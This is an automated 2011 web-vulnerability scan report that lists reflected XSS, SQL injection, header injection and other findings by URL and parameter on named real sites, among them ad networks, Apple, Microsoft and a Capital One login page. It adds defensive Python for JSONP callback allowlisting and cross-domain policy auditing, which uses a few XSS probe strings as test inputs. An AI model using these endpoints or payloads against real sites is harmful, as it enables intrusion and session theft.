XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 07232011-01

Report generated by XSS.CX at Sat Jul 23 10:10:40 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search


1. SQL injection

1.1. http://web2.checkm8.com/adam/detect [name of an arbitrarily supplied request parameter]

1.2. http://www.betabeat.com/wp-content/themes/nyo_tech/images/betabeat.png [REST URL parameter 1]

1.3. http://www.betabeat.com/wp-content/themes/nyo_tech/images/betabeat.png [REST URL parameter 2]

1.4. http://www.betabeat.com/wp-content/themes/nyo_tech/images/betabeat.png [REST URL parameter 3]

1.5. http://www.observer.com/wp-content/themes/nyo_tech/images/observer.png [REST URL parameter 2]

2. HTTP header injection

2.1. http://ad.doubleclick.net/ad/x1.aud/capitalone/exclusion [REST URL parameter 1]

2.2. http://ad.doubleclick.net/adj/N5762.interclick.com/B5644777.4 [REST URL parameter 1]

2.3. http://ad.doubleclick.net/adj/scmag.hmktus/sc [REST URL parameter 1]

2.4. http://ad.doubleclick.net/getcamphist [src parameter]

3. Cross-site scripting (reflected)

3.1. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [REST URL parameter 2]

3.2. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [REST URL parameter 3]

3.3. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [name of an arbitrarily supplied request parameter]

3.4. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [sz parameter]

3.5. http://a.collective-media.net/adj/idgt.curse/idgtcoad [REST URL parameter 2]

3.6. http://a.collective-media.net/adj/idgt.curse/idgtcoad [REST URL parameter 3]

3.7. http://a.collective-media.net/adj/idgt.curse/idgtcoad [name of an arbitrarily supplied request parameter]

3.8. http://a.collective-media.net/adj/idgt.curse/idgtcoad [sec parameter]

3.9. http://a.collective-media.net/adj/q1.boston/life [REST URL parameter 2]

3.10. http://a.collective-media.net/adj/q1.boston/life [REST URL parameter 3]

3.11. http://a.collective-media.net/adj/q1.boston/life [name of an arbitrarily supplied request parameter]

3.12. http://a.collective-media.net/adj/q1.boston/life [sz parameter]

3.13. http://a.collective-media.net/adj/q1.q.boston/be_life [REST URL parameter 2]

3.14. http://a.collective-media.net/adj/q1.q.boston/be_life [REST URL parameter 3]

3.15. http://a.collective-media.net/adj/q1.q.boston/be_life [name of an arbitrarily supplied request parameter]

3.16. http://a.collective-media.net/adj/q1.q.boston/be_life [sz parameter]

3.17. http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911 [REST URL parameter 2]

3.18. http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911 [sz parameter]

3.19. http://a.fsdn.com/adops/google/rev2/afc/css/ [id parameter]

3.20. http://a.netmng.com/hic/ [click parameter]

3.21. http://a.netmng.com/hic/ [click parameter]

3.22. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_newsreel [name of an arbitrarily supplied request parameter]

3.23. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_newsreel [u parameter]

3.24. http://ad.doubleclick.net/adj/N2883.132636.QUADRANTONE.COM/B5629721.18 [sz parameter]

3.25. http://ad.doubleclick.net/adj/lfs2.lifescript/conditions [path parameter]

3.26. http://ad.doubleclick.net/adj/ostg.sourceforge/cons_none_p71_text [name of an arbitrarily supplied request parameter]

3.27. http://ad.doubleclick.net/adj/ostg.sourceforge/cons_none_p71_text [pg parameter]

3.28. http://ad.doubleclick.net/adj/ostg.sourceforge/pg_viewvc_p88_shortrec [name of an arbitrarily supplied request parameter]

3.29. http://ad.doubleclick.net/adj/ostg.sourceforge/pg_viewvc_p88_shortrec [pg parameter]

3.30. http://ad.turn.com/server/pixel.htm [fpid parameter]

3.31. http://ad.turn.com/server/pixel.htm [sp parameter]

3.32. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

3.33. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

3.34. http://ads.adap.tv/beacons [callback parameter]

3.35. http://adserver.adtechus.com/addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH [AdId parameter]

3.36. http://adserver.adtechus.com/addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH [name of an arbitrarily supplied request parameter]

3.37. http://api.bizographics.com/v1/profile.json [&callback parameter]

3.38. http://api.bizographics.com/v1/profile.json [api_key parameter]

3.39. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

3.40. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

3.41. http://api.chartbeat.com/toppages/ [jsonp parameter]

3.42. http://b.scorecardresearch.com/beacon.js [c1 parameter]

3.43. http://b.scorecardresearch.com/beacon.js [c10 parameter]

3.44. http://b.scorecardresearch.com/beacon.js [c15 parameter]

3.45. http://b.scorecardresearch.com/beacon.js [c2 parameter]

3.46. http://b.scorecardresearch.com/beacon.js [c3 parameter]

3.47. http://b.scorecardresearch.com/beacon.js [c4 parameter]

3.48. http://b.scorecardresearch.com/beacon.js [c5 parameter]

3.49. http://b.scorecardresearch.com/beacon.js [c6 parameter]

3.50. http://bostonglobe.tt.omtrdc.net/m2/bostonglobe/mbox/standard [mbox parameter]

3.51. http://bs.serving-sys.com/BurstingPipe/adServer.bs [apui parameter]

3.52. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer [trurl parameter]

3.53. http://dinclinx.com/ [name of an arbitrarily supplied request parameter]

3.54. http://event.adxpose.com/event.flow [uid parameter]

3.55. http://home.myyearbook.com/Countries [callback parameter]

3.56. http://home.myyearbook.com/feed/giftFeedItems [REST URL parameter 2]

3.57. http://home.myyearbook.com/feed/myMagFeedItems [REST URL parameter 2]

3.58. http://home.myyearbook.com/feed/tvFeedItems [REST URL parameter 2]

3.59. http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

3.60. http://i1.services.social.s-msft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

3.61. http://i2.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

3.62. http://i3.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

3.63. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

3.64. http://ib.adnxs.com/ab [ccd parameter]

3.65. http://ib.adnxs.com/ab [cnd parameter]

3.66. http://ib.adnxs.com/ab [referrer parameter]

3.67. http://ib.adnxs.com/ab [tt_code parameter]

3.68. http://ib.adnxs.com/ptj [redir parameter]

3.69. http://img.mediaplex.com/content/0/16024/128483/lifescript-470x250.js [mpck parameter]

3.70. http://img.mediaplex.com/content/0/16024/128483/lifescript-470x250.js [mpvc parameter]

3.71. http://jlinks.industrybrains.com/jsct [ct parameter]

3.72. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]

3.73. http://js.revsci.net/gateway/gw.js [csid parameter]

3.74. http://km.support.apple.com/kb/index [doctype parameter]

3.75. http://lifescript.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

3.76. http://mm.chitika.net/minimall [callback parameter]

3.77. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

3.78. http://services.social.microsoft.com/Search/Data/Terms [callback parameter]

3.79. http://services.social.microsoft.com/Search/Data/Terms [t parameter]

3.80. http://sgy.sitescout.com/tag.jsp [h parameter]

3.81. http://sgy.sitescout.com/tag.jsp [pid parameter]

3.82. http://sgy.sitescout.com/tag.jsp [w parameter]

3.83. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]

3.84. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]

3.85. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]

3.86. http://sitelife.boston.com/ver1.0/Direct/Jsonp [cb parameter]

3.87. http://sm6.sitemeter.com/js/counter.asp [site parameter]

3.88. http://sm6.sitemeter.com/js/counter.js [site parameter]

3.89. http://social.msdn.microsoft.com/Search/en-US [REST URL parameter 2]

3.90. http://sr2.liveperson.net/visitor/addons/deploy2.asp [site parameter]

3.91. http://syn.5min.com/handlers/SenseHandler.ashx [name of an arbitrarily supplied request parameter]

3.92. http://widgets.klout.com/ [from parameter]

3.93. http://widgets.klout.com/ [name of an arbitrarily supplied request parameter]

3.94. http://www.apple.com/global/scripts/search_featured.php [q parameter]

3.95. http://www.lijit.com/delivery/fp [n parameter]

3.96. http://www.myyearbook.com/advertising/default.php [n parameter]

3.97. http://www.myyearbook.com/advertising/default.php [name of an arbitrarily supplied request parameter]

3.98. http://www.myyearbook.com/advertising/default.php [section parameter]

3.99. http://www.myyearbook.com/advertising/default.php [section parameter]

3.100. http://www.myyearbook.com/advertising/default.php [site parameter]

3.101. http://www.myyearbook.com/advertising/default.php [size parameter]

3.102. http://www.myyearbook.com/advertising/default.php [sub parameter]

3.103. http://www.othersonline.com/partner/scripts/myyearbook/page_parser.js [d parameter]

3.104. http://www.paloaltonetworks.com/cam/switch/index.php [name of an arbitrarily supplied request parameter]

3.105. http://www.paloaltonetworks.com/cam/switch/index.php [ts parameter]

3.106. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 1]

3.107. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 1]

3.108. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 2]

3.109. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 2]

3.110. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 2]

3.111. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 3]

3.112. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 3]

3.113. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 3]

3.114. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 3]

3.115. http://www.silverpop.com/preferences_sf/login.sp [failureHandler parameter]

3.116. http://www.silverpop.com/preferences_sf/login.sp [successHandler parameter]

3.117. http://www.silverpop.com/preferences_sf/prepopulateFields.js.sp [&fld[] parameter]

3.118. http://www.silverpop.com/preferences_sf/prepopulateFields.js.sp [fld[] parameter]

3.119. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

3.120. http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911 [cli cookie]

3.121. http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911 [cli cookie]

3.122. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

3.123. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

3.124. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

3.125. http://ar.voicefive.com/bmx3/broker.pli [ar_p101983071 cookie]

3.126. http://ar.voicefive.com/bmx3/broker.pli [ar_p110040101 cookie]

3.127. http://ar.voicefive.com/bmx3/broker.pli [ar_p87077372 cookie]

3.128. http://ar.voicefive.com/bmx3/broker.pli [ar_p98294060 cookie]

3.129. http://seg.sharethis.com/getSegment.php [__stid cookie]

3.130. https://servicing.capitalone.com/c1/login.aspx [VS_COOKIE cookie]

3.131. http://sm6.sitemeter.com/js/counter.asp [IP cookie]

3.132. http://sm6.sitemeter.com/js/counter.js [IP cookie]

3.133. http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220 [meld_sess cookie]

3.134. http://www.myyearbook.com/advertising/default.php [MYB_TARGET cookie]
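Most of the reflected XSS entries above sit in callback-style parameters (callback, jsonp, cb, admeld_callback, successHandler, failureHandler) of JSONP endpoints, where the server writes the parameter verbatim at the start of a JavaScript response. The following Python is an added example, not code from XSS.CX or from any of the hosts listed: a callback allowlist and a response builder showing the hardened form. The function names, the 64-character limit and the probe strings are assumptions for illustration.

```python
import json
import re

# Allowlist: a dotted JavaScript identifier path such as "jQuery17101.cb" or
# "window.__cb". Parentheses, quotes, angle brackets and slashes are rejected;
# those are what turn a reflected callback name into script execution.
_CALLBACK_RE = re.compile(r"[A-Za-z_$][A-Za-z0-9_$]*(?:\.[A-Za-z_$][A-Za-z0-9_$]*)*")
_MAX_CALLBACK_LEN = 64  # assumed limit; long callback names have no legitimate use


def safe_callback(name):
    """True if `name` may be echoed as the JSONP wrapper function."""
    return (isinstance(name, str)
            and 0 < len(name) <= _MAX_CALLBACK_LEN
            and _CALLBACK_RE.fullmatch(name) is not None)


def js_safe_json(obj):
    """JSON that is also safe inside a script: json.dumps escapes quotes and
    backslashes; this additionally escapes <, >, & and the U+2028/U+2029 line
    terminators so the body can never close a <script> tag or break a JS
    string if the response is ever interpreted as HTML or inlined."""
    s = json.dumps(obj, ensure_ascii=False)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026"),
                    ("\u2028", "\\u2028"), ("\u2029", "\\u2029")):
        s = s.replace(ch, esc)
    return s


def render_jsonp(callback, payload):
    """Return (status, headers, body). A bad callback is rejected rather than
    "cleaned", so a probe such as callback=alert(1)// gets a 400 instead of
    a 200 that reflects part of the input."""
    if not safe_callback(callback):
        return 400, {"Content-Type": "text/plain; charset=utf-8"}, "invalid callback"
    # The leading /**/ is harmless to JS and prevents the body from being a
    # valid SWF that starts with the callback name (the Rosetta Flash trick),
    # which matters on hosts that also serve a permissive crossdomain.xml.
    body = "/**/" + callback + "(" + js_safe_json(payload) + ");"
    headers = {
        "Content-Type": "application/javascript; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    return 200, headers, body


if __name__ == "__main__":
    # Constructed probes, modelled on the parameter names in the list above.
    for cb in ("jQuery17101234", "window.cb_1", "alert(1)//", "<script>alert(1)</script>"):
        status, _, body = render_jsonp(cb, {"msg": "</script><svg/onload=alert(1)>"})
        print(repr(cb), "->", status, body)
```

The allowlist is the whole fix: any scheme that tries to strip dangerous characters from the callback is bypassable, while a strict identifier grammar leaves nothing for the browser to execute. Escaping `<` and `>` inside the JSON covers the case where the same endpoint is reachable with a content type the browser will treat as HTML.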

4. Flash cross-domain policy

4.1. http://a1.interclick.com/crossdomain.xml

4.2. http://ad.doubleclick.net/crossdomain.xml

4.3. http://altfarm.mediaplex.com/crossdomain.xml

4.4. http://analytics.spongecell.com/crossdomain.xml

4.5. http://api.chartbeat.com/crossdomain.xml

4.6. http://api.facebook.com/crossdomain.xml

4.7. http://cdn.interclick.com/crossdomain.xml

4.8. http://clk.atdmt.com/crossdomain.xml

4.9. http://contextlinks.netseer.com/crossdomain.xml

4.10. http://fls.doubleclick.net/crossdomain.xml

4.11. http://gadgets.justanswer.com/crossdomain.xml

4.12. http://haymarketbusinesspublications.122.2o7.net/crossdomain.xml

4.13. http://ic.nexac.com/crossdomain.xml

4.14. http://img.mediaplex.com/crossdomain.xml

4.15. http://l.5min.com/crossdomain.xml

4.16. http://m.webtrends.com/crossdomain.xml

4.17. http://metrics.apple.com/crossdomain.xml

4.18. http://pfiles.5min.com/crossdomain.xml

4.19. http://pixel.everesttech.net/crossdomain.xml

4.20. http://pixel1350.everesttech.net/crossdomain.xml

4.21. http://pshared.5min.com/crossdomain.xml

4.22. http://puma.vizu.com/crossdomain.xml

4.23. http://rad.msn.com/crossdomain.xml

4.24. http://secure-us.imrworldwide.com/crossdomain.xml

4.25. http://syn.5min.com/crossdomain.xml

4.26. http://web2.checkm8.com/crossdomain.xml

4.27. http://www.righthealth.com/crossdomain.xml

4.28. http://community.spiceworks.com/crossdomain.xml

4.29. http://disqus.com/crossdomain.xml

4.30. http://feeds.bbci.co.uk/crossdomain.xml

4.31. http://googleads.g.doubleclick.net/crossdomain.xml

4.32. http://images.apple.com/crossdomain.xml

4.33. http://mm.chitika.net/crossdomain.xml

4.34. http://newsrss.bbc.co.uk/crossdomain.xml

4.35. http://pagead2.googlesyndication.com/crossdomain.xml

4.36. http://pubads.g.doubleclick.net/crossdomain.xml

4.37. http://static.ak.fbcdn.net/crossdomain.xml

4.38. http://www.apple.com/crossdomain.xml

4.39. http://www.disqus.com/crossdomain.xml

4.40. http://www.facebook.com/crossdomain.xml

4.41. http://www.scmagazineus.com/crossdomain.xml

5. Silverlight cross-domain policy

5.1. http://ad.doubleclick.net/clientaccesspolicy.xml

5.2. http://clk.atdmt.com/clientaccesspolicy.xml

5.3. http://haymarketbusinesspublications.122.2o7.net/clientaccesspolicy.xml

5.4. http://metrics.apple.com/clientaccesspolicy.xml

5.5. http://rad.msn.com/clientaccesspolicy.xml

5.6. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

5.7. http://i.microsoft.com/clientaccesspolicy.xml

5.8. http://i3.microsoft.com/clientaccesspolicy.xml

5.9. http://www.microsoft.com/clientaccesspolicy.xml
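Sections 4 and 5 list hosts that serve a Flash crossdomain.xml or a Silverlight clientaccesspolicy.xml; the scanner reports the file's presence, and what matters is whether the policy grants every origin. The Python below is an added example, not XSS.CX code and not any of the listed hosts' real policy: it parses both formats and flags the permissive settings a reviewer looks for. The four sample policies are constructed for illustration, as are the function names.

```python
import xml.etree.ElementTree as ET

# Constructed sample policies; none of these was fetched from a host above.
PERMISSIVE_CROSSDOMAIN = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="all"/>
  <allow-access-from domain="*" secure="false"/>
  <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>"""

STRICT_CROSSDOMAIN = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="www.example.com"/>
</cross-domain-policy>"""

PERMISSIVE_CLIENTACCESS = """<?xml version="1.0"?>
<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from http-request-headers="*">
        <domain uri="*"/>
      </allow-from>
      <grant-to>
        <resource path="/" include-subpaths="true"/>
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>"""

STRICT_CLIENTACCESS = """<?xml version="1.0"?>
<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from>
        <domain uri="https://www.example.com"/>
      </allow-from>
      <grant-to>
        <resource path="/api/" include-subpaths="true"/>
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>"""


def _wildcard(value):
    # "*" is every origin; "*.example.com" is every subdomain and is flagged too,
    # because one XSS on any subdomain then reaches this host's responses.
    return value is not None and (value == "*" or value.startswith("*."))


def audit_crossdomain(xml_text):
    """Issues in a Flash crossdomain.xml document; an empty list means strict."""
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        return ["root element is <%s>, not <cross-domain-policy>" % root.tag]
    issues = []
    sc = root.find("site-control")
    if sc is not None and sc.get("permitted-cross-domain-policies") == "all":
        issues.append("site-control: policy files are honoured from any path on the host")
    for el in root.iter("allow-access-from"):
        domain = el.get("domain", "")
        if _wildcard(domain):
            issues.append("allow-access-from domain=%r: any SWF may read authenticated responses" % domain)
        if el.get("secure", "true").lower() == "false":
            issues.append("allow-access-from domain=%r secure=\"false\": plain-HTTP SWFs may read HTTPS content" % domain)
    for el in root.iter("allow-http-request-headers-from"):
        if _wildcard(el.get("domain", "")):
            issues.append("allow-http-request-headers-from domain=%r headers=%r: any site may send custom headers"
                          % (el.get("domain"), el.get("headers")))
    return issues


def audit_clientaccesspolicy(xml_text):
    """Issues in a Silverlight clientaccesspolicy.xml document."""
    root = ET.fromstring(xml_text)
    if root.tag != "access-policy":
        return ["root element is <%s>, not <access-policy>" % root.tag]
    issues = []
    for allow in root.iter("allow-from"):
        if allow.get("http-request-headers") == "*":
            issues.append("allow-from http-request-headers=\"*\": any request header may be sent cross-domain")
        for d in allow.iter("domain"):
            uri = d.get("uri", "")
            if uri == "*" or "://*" in uri:
                issues.append("domain uri=%r: grants access to every origin" % uri)
            elif uri.startswith("http://"):
                issues.append("domain uri=%r: grants access to a plain-HTTP origin" % uri)
    return issues


if __name__ == "__main__":
    for label, fn, text in (("crossdomain (permissive)", audit_crossdomain, PERMISSIVE_CROSSDOMAIN),
                            ("crossdomain (strict)", audit_crossdomain, STRICT_CROSSDOMAIN),
                            ("clientaccesspolicy (permissive)", audit_clientaccesspolicy, PERMISSIVE_CLIENTACCESS),
                            ("clientaccesspolicy (strict)", audit_clientaccesspolicy, STRICT_CLIENTACCESS)):
        print(label, "->", fn(text) or "no issues")
```

A wildcard policy is only a problem on a host that serves anything authenticated or user-specific; an ad pixel host with no session cookies can legitimately publish `domain="*"`. The check is therefore the start of a review, not the verdict.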

6. Cleartext submission of password

6.1. http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js

6.2. http://forums.vostu.com/

6.3. http://forums.vostu.com/forums/41-Como-Jogar

6.4. http://static.curse.com/themes/common/v6/scripts/core.js

6.5. http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/

7. XML injection

7.1. http://www.scmagazineus.com/webservice/ImageResizer.ashx [h parameter]

7.2. http://www.scmagazineus.com/webservice/ImageResizer.ashx [w parameter]

8. Session token in URL

8.1. http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js

8.2. http://bostonglobe.tt.omtrdc.net/m2/bostonglobe/mbox/standard

8.3. http://games.myyearbook.com/

8.4. http://games.myyearbook.com/landing/pool

8.5. http://l.sharethis.com/pview

8.6. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

8.7. http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage

8.8. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo

8.9. http://mt0.googleapis.com/mapslt/ft

8.10. https://onlinebanking.capitalone.com/CapitalOne/OAO/initiation.aspx

8.11. http://www.capitalone.com/redirect.php

8.12. http://www.datacard.com/combined.js

8.13. http://www.datacard.com/id/js/libs/hoverIntent-min.js

8.14. http://www.datacard.com/id/js/libs/jquery-1.2.6.pack.js

8.15. http://www.datacard.com/id/js/libs/thickbox-compressed.js

8.16. http://www.datacard.com/id/js/search/highlight-min.js

8.17. http://www.datacard.com/id/swfobject/swfobject.js

8.18. http://www.facebook.com/extern/login_status.php

8.19. http://www.google.com/recaptcha/api/challenge

8.20. http://www.pages05.net/WTS/event.jpeg

9. Password field submitted using GET method

10. Cookie scoped to parent domain

10.1. http://c.microsoft.com/trans_pixel.aspx

10.2. http://clients.mobilecause.com/lists/1227/subscriptions/web.js

10.3. http://games.myyearbook.com/

10.4. http://games.myyearbook.com/landing/pool

10.5. http://hipservice.live.com/gethip.srf

10.6. http://home.myyearbook.com/Countries

10.7. http://home.myyearbook.com/feed/giftFeedItems

10.8. http://home.myyearbook.com/feed/myMagFeedItems

10.9. http://home.myyearbook.com/feed/tvFeedItems

10.10. http://pixel.everesttech.net/2368/gr

10.11. http://pixel1350.everesttech.net/1350/p

10.12. http://t.mookie1.com/t/v1/imp

10.13. http://wow.curse.com/user/NetworkCookie/ajaxSession.aspx

10.14. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911

10.15. http://a.netmng.com/hic/

10.16. http://a.tribalfusion.com/j.ad

10.17. http://a1.interclick.com/ColDta.aspx

10.18. http://ad.turn.com/server/ads.js

10.19. http://ad.turn.com/server/pixel.htm

10.20. http://ads.adap.tv/beacons

10.21. http://ads.adap.tv/cookie

10.22. http://ads.pointroll.com/PortalServe/

10.23. http://adx.adnxs.com/mapuid

10.24. http://ak1.abmr.net/is/a.collective-media.net

10.25. http://ak1.abmr.net/is/showadsak.pubmatic.com

10.26. http://amch.questionmarket.com/adsc/d922005/24/42823090/decide.php

10.27. http://amch.questionmarket.com/adsc/d922005/24/42823584/decide.php

10.28. http://amch.questionmarket.com/adsc/d922005/24/42823586/decide.php

10.29. http://amch.questionmarket.com/adsc/d922005/24/42825515/decide.php

10.30. http://amch.questionmarket.com/adsc/d922005/24/42825637/decide.php

10.31. http://ap.lijit.com/www/delivery/retarget.php

10.32. http://api.bizographics.com/v1/profile.json

10.33. http://api.bizographics.com/v1/profile.redirect

10.34. http://apr.lijit.com///www/delivery/ajs.php

10.35. http://ar.voicefive.com/bmx3/broker.pli

10.36. http://at.amgdgt.com/ads/

10.37. http://b.scorecardresearch.com/b

10.38. http://b.scorecardresearch.com/p

10.39. http://b.scorecardresearch.com/r

10.40. http://b.voicefive.com/b

10.41. http://bcp.crwdcntrl.net/4/c=520%7Crand=110304385%7Cpv=y%7Crt=ifr

10.42. http://bh.contextweb.com/bh/getuid

10.43. http://bs.serving-sys.com/BurstingPipe/adServer.bs

10.44. http://c.atdmt.com/c.gif

10.45. http://c.bing.com/c.gif

10.46. http://c.live.com/c.gif

10.47. http://ce.lijit.com/merge

10.48. http://cf.addthis.com/red/p.json

10.49. http://clk.atdmt.com/goiframe/222276744/331989646/direct

10.50. http://clk.atdmt.com/goiframe/223672189/334126009/direct

10.51. http://cms.quantserve.com/dpixel

10.52. http://code.msdn.microsoft.com/

10.53. http://code.msdn.microsoft.com/globalresources/scripts/ms2.js

10.54. http://code.msdn.microsoft.com/site/upload

10.55. http://community.spiceworks.com/r/595

10.56. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer

10.57. http://cspix.media6degrees.com/orbserv/hbpix

10.58. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4146544210108361256/mchpid/3/url/

10.59. http://gam.adnxs.com/gtj

10.60. http://home.live.com/search

10.61. http://home.live.com/search/

10.62. http://home.live.com/search/hip

10.63. http://i.w55c.net/ping_match.gif

10.64. http://ib.adnxs.com/ab

10.65. http://ib.adnxs.com/getuid

10.66. http://ib.adnxs.com/getuidnb

10.67. http://ib.adnxs.com/if

10.68. http://ib.adnxs.com/mapuid

10.69. http://ib.adnxs.com/ptj

10.70. http://ib.adnxs.com/ptj

10.71. http://ib.adnxs.com/ptj

10.72. http://ib.adnxs.com/seg

10.73. http://id.google.com/verify/EAAAADlr6isilNNYzGAaxKhrZpM.gif

10.74. http://id.google.com/verify/EAAAAEwMF-hbQc293ckILMv5etg.gif

10.75. http://id.google.com/verify/EAAAAFtbipzwLyDvaVuyeCeXNM4.gif

10.76. http://id.google.com/verify/EAAAAOJV-bC0aOnp7SAOnBJZllE.gif

10.77. http://id.google.com/verify/EAAAAO_wEIygyxFXLeRT2ha2P9w.gif

10.78. http://idcs.interclick.com/Segment.aspx

10.79. http://image2.pubmatic.com/AdServer/Pug

10.80. http://image2.pubmatic.com/AdServer/Pug

10.81. http://image2.pubmatic.com/AdServer/Pug

10.82. http://images.apple.com/global/metrics/js/s_code_h.js

10.83. http://images.apple.com/global/nav/scripts/globalnav.js

10.84. http://images.apple.com/global/nav/styles/navigation.css

10.85. http://images.apple.com/global/scripts/apple_core.js

10.86. http://images.apple.com/global/scripts/browserdetect.js

10.87. http://images.apple.com/global/scripts/content_swap.js

10.88. http://images.apple.com/global/scripts/lib/event_mixins.js

10.89. http://images.apple.com/global/scripts/lib/prototype.js

10.90. http://images.apple.com/global/scripts/lib/scriptaculous.js

10.91. http://images.apple.com/global/scripts/overlay_panel.js

10.92. http://images.apple.com/global/scripts/promomanager.js

10.93. http://images.apple.com/global/scripts/search_decorator.js

10.94. http://images.apple.com/global/scripts/swap_view.js

10.95. http://images.apple.com/global/scripts/view_master_tracker.js

10.96. http://images.apple.com/global/styles/base.css

10.97. http://images.apple.com/macpro/scripts/pagenav.js

10.98. http://images.apple.com/macpro/scripts/performance.js

10.99. http://images.apple.com/metrics/scripts/s_code_h.js

10.100. http://images.apple.com/support/css/base_new.css

10.101. http://images.apple.com/support/css/global/nav/navigation.css

10.102. http://images.apple.com/support/css/suggest2.css

10.103. http://images.apple.com/support/css/support.css

10.104. http://images.apple.com/support/home/css/home2011.css

10.105. http://images.apple.com/support/iknow/scripts/ACQuicklinks2.js

10.106. http://images.apple.com/support/iknow/scripts/ACShortcuts.js

10.107. http://images.apple.com/support/scripts/AppleCareWeb/Modules/ExpressLane.js

10.108. http://images.apple.com/support/scripts/SCReporting.js

10.109. http://images.apple.com/support/scripts/module_decorator.js

10.110. http://images.apple.com/support/scripts/new_country.js

10.111. http://images.apple.com/support/scripts/new_support_coverage/cookies.js

10.112. http://images.apple.com/support/scripts/new_support_coverage/en_strings.js

10.113. http://images.apple.com/support/scripts/new_support_coverage/functions.js

10.114. http://images.apple.com/support/scripts/psp_geos.js

10.115. http://images.apple.com/support/scripts/support.global.js

10.116. http://images.apple.com/support/scripts/warranty_check/warrantykeys.js

10.117. http://images.apple.com/support/scripts/warranty_check/warrantypsp.js

10.118. http://js.revsci.net/gateway/gw.js

10.119. http://leadback.advertising.com/adcedge/lb

10.120. http://lifescript.us.intellitxt.com/intellitxt/front.asp

10.121. http://lm.trafficmp.com/clicksense/epic

10.122. http://load.exelator.com/load/

10.123. http://m.adnxs.com/msftcookiehandler

10.124. http://media.fastclick.net/w/get.media

10.125. http://media.trafficmp.com/a/js

10.126. http://media.trafficmp.com/a/js

10.127. http://msdn.microsoft.com/magazine/ee336135.aspx

10.128. http://mssto.112.2o7.net/b/ss/msstoerrors/1/H.20.2--NS/0

10.129. http://odb.outbrain.com/utils/get

10.130. http://p.brilig.com/contact/bct

10.131. http://pix04.revsci.net/A11149/a4/0/0/123.302

10.132. http://pix04.revsci.net/D08734/a1/0/3/0.js

10.133. http://pix04.revsci.net/G07608/a4/0/0/pcx.js

10.134. http://pix04.revsci.net/J08778/b3/0/3/1008211/347187000.js

10.135. http://pix04.revsci.net/J08778/b3/0/3/1008211/435975349.js

10.136. http://pix04.revsci.net/J08778/b3/0/3/1008211/674742100.js

10.137. http://pixel.33across.com/ps/

10.138. http://pixel.quantserve.com/pixel

10.139. http://pixel.quantserve.com/pixel/p-c9d_b-0iR8pjg.gif

10.140. http://profile.live.com/Handlers/Plt.mvc

10.141. http://profile.live.com/favicon.ico

10.142. http://r.openx.net/set

10.143. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8y/rnd/772053252

10.144. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8z/

